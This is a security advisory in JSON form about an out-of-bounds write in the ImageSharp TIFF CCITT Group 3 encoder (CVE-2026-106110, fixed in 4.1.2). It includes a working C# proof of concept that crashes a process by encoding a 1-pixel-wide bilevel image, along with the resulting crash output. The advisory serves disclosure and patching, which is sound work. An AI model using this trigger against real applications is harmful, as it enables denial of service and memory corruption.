{"schema_version":"1.9.0","id":"GHSA-j9gm-c75j-xc9q","published":"2026-10-07T20:24:28Z","modified":"2026-10-07T20:30:06.875092026Z","aliases":["CVE-2026-106110"],"summary":"ImageSharp: TIFF CCITT T4 encoder can write past its compressed output buffer","details":"### Summary\n\nImageSharp's TIFF CCITT Group 3 (T4) encoder can write beyond its allocated compressed-data buffer when encoding narrow 1-bit images. The unchecked writes can corrupt process memory and terminate the process.\n\nThis report concerns only the T4 `CcittGroup3Fax` encoder path. It replaces the prior, unrelated ICC content.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 2.0.0, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T4 encoder and its undersized buffer calculation first shipped in v2.0.0. The narrow-image exploit terminates published v2.0.0 and v4.1.1 while the same-height 64-pixel control succeeds on both. Every release through v4.1.1 retains the vulnerable allocation and unchecked bit-write structure.\n### Preconditions and impact\n\nThe affected path is reached when the application encodes 1-bit image data with `TiffCompression.CcittGroup3Fax`. This can happen when an application explicitly selects `TiffEncoder.BitsPerPixel = Bit1` and `TiffEncoder.Compression = CcittGroup3Fax`. It can also occur when an application decodes a TIFF and re-encodes it using the default `TiffEncoder`, because ImageSharp retains TIFF frame metadata including the compression and bit depth.\n\n`TiffCompressorFactory` creates `T4BitCompressor` for `CcittGroup3Fax`. `TiffCcittCompressor.Initialize` allocates `Width * rowsPerStrip` bytes, but non-modified T4 writes a 12-bit EOL before row data and an additional 12-bit EOL per row. `WriteCode` calls `BitWriterUtils.WriteBit` and `WriteZeroBit`, both of which use `Unsafe.Add` without a capacity check. Thus the encoded bit stream can exceed the allocated span.\n\nA 1-pixel-wide, 2000-row alternating bilevel image caused a fatal `System.AccessViolationException` during T4 compression. This is a memory-corruption and availability issue for applications that expose this encoding flow to attacker-controlled input.\n\n### Tested environment\n\n- Package binary: NuGet `SixLabors.ImageSharp` **4.1.1**\n- Target framework: `net8.0`\n- Runtime: .NET 8.0.30; SDK 8.0.424\n- Operating system: Debian GNU/Linux 12 (bookworm), Linux arm64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nIn a `net8.0` project that references the published `SixLabors.ImageSharp` 4.1.1 binary, save the following as `Program.cs`. Run `dotnet run -- exploit 2000` for the trigger and `dotnet run -- control 2000` for the control.\n\n```csharp\nusing System;\nusing System.IO;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstring mode = args.Length > 0 ? args[0] : \"exploit\";\nint width = mode == \"control\" ? 64 : 1;\nint height = args.Length > 1 ? int.Parse(args[1]) : 2000;\n\nConsole.WriteLine($\"mode={mode} width={width} height={height}\");\nusing var image = new Image<L8>(width, height);\nfor (int y = 0; y < image.Height; y++)\n    for (int x = 0; x < image.Width; x++)\n        image[x, y] = new L8((byte)(((x + y) & 1) == 0 ? 255 : 0));\n\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nmetadata.BitsPerPixel = TiffBitsPerPixel.Bit1;\nmetadata.Compression = TiffCompression.CcittGroup3Fax;\n\nusing var output = new MemoryStream();\nimage.Save(output, new TiffEncoder());\nConsole.WriteLine($\"Encoded OK: {output.Length} bytes\");\n```\n\nAgainst the published 4.1.1 package, this produced:\n\n```text\nmode=exploit width=1 height=2000\nFatal error. System.AccessViolationException: Attempted to read or write protected memory.\n  at ...TiffCcittCompressor.GetWhiteTermCode(...)\n  at ...T4BitCompressor.CompressStrip(...)\n```\n\nA 64-pixel-wide, 2000-row control using the same Group 3 metadata completed successfully:\n\n```text\nmode=control width=64 height=2000\nEncoded OK: 76230 bytes\n```\n\nThe direct public configuration path also triggers with:\n\n```csharp\nnew TiffEncoder\n{\n    BitsPerPixel = TiffBitsPerPixel.Bit1,\n    Compression = TiffCompression.CcittGroup3Fax\n};\n```","affected":[{"package":{"name":"SixLabors.ImageSharp","ecosystem":"NuGet","purl":"pkg:nuget/SixLabors.ImageSharp"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.0.0"},{"fixed":"4.1.2"}]}],"versions":["2.0.0","2.1.0","2.1.1","2.1.10","2.1.11","2.1.12","2.1.13","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","3.0.0","3.0.1","3.0.2","3.1.0","3.1.1","3.1.10","3.1.11","3.1.12","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","4.0.0","4.1.0","4.1.1"],"database_specific":{"last_known_affected_version_range":"<= 4.1.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-j9gm-c75j-xc9q/GHSA-j9gm-c75j-xc9q.json"}}],"references":[{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-j9gm-c75j-xc9q"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106110"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/pull/3187"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/commit/a9498c6db3642ef92c712ebc81e706914ac16a95"},{"type":"PACKAGE","url":"https://github.com/SixLabors/ImageSharp"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/releases/tag/v4.1.2"}],"database_specific":{"cwe_ids":["CWE-787"],"github_reviewed":true,"github_reviewed_at":"2026-10-07T20:24:28Z","nvd_published_at":"2026-10-06T18:16:52Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}